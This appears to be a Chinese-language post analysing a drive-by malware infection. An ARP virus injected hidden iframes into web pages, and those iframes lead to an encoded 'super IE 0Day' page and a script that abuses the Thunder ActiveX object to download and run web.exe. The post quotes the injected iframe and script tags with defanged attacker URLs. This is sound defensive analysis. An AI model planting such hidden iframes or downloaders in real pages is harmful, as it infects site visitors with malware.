今天在使用Web邮箱时,Kaspersky报告:
/--- 已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm ---/
Google搜索了一下,发现此代码是一种ARP病毒添加的。
检查发现网页都被加入了代码:
/--- <iframe SRC="hxxp://mm***.98*7**99***9.com/abc.htm" width="1" height="1" frameborder="0"> </iframe> ---/
hxxp://mm***.98*7**99***9.com/abc.htm 的标题为:mobile phone,内容为Service Unavailable,有迷惑性。
包含代码:
/--- <iframe src=hxxp://mm***.98*7**99***9.com/mm/a.htm width=100 height=0></iframe> ---/
hxxp://mm***.98*7**99***9.com/mm/a.htm 标题为:LOVE!,包含两段恶意代码。
其一是采用US-ASCII编码的字符串。
其二是代码:
/--- <Script language="Javascript" src="hxxp://mm***.98*7**99***9.com/mm/b.js"></Script> ---/
到 http://purpleendurer.ys168.com 下载US-ASCII编码解码程序解密后,得到一段网页代码,标题为:super IE 0Day,内容分为三个部分。
其一是javascript脚本代码,包含两个自定义函数MakeItSo()和detectOS(),MakeItSo()使用detectOS()检测浏览者电脑的Windows版本,如果是 Windows XP或Windows 2003,就打开logo.htm,否则打开banner.htm。
其二是VBScript脚本代码,功能是是创建对象 Microsoft.XMLHTTP,如果不成功就输出JavaScript脚本代码:
/--- <SCRIPT LANGUAGE="javascript">window.setTimeout(""MakeItSo()"",5000);</script> ---/
否则输出代码:
/--- <iframe width="0" height="0" src="apple.htm"></iframe>") ---/
其三是javascript脚本代码,功能是检测cookiewoshi0day是否存在,若不存在则创建,并输出代码:
/--- <iframe width=0 height=0 src=help.htm></iframe> ---/
hxxp://mm***.98*7**99***9.com/mm/b.js内容未加密,功能是利用ThunderServer.webThunder.1下载hxxp://www.98*7**99***9.com/web.exe,保存到c:/并运行。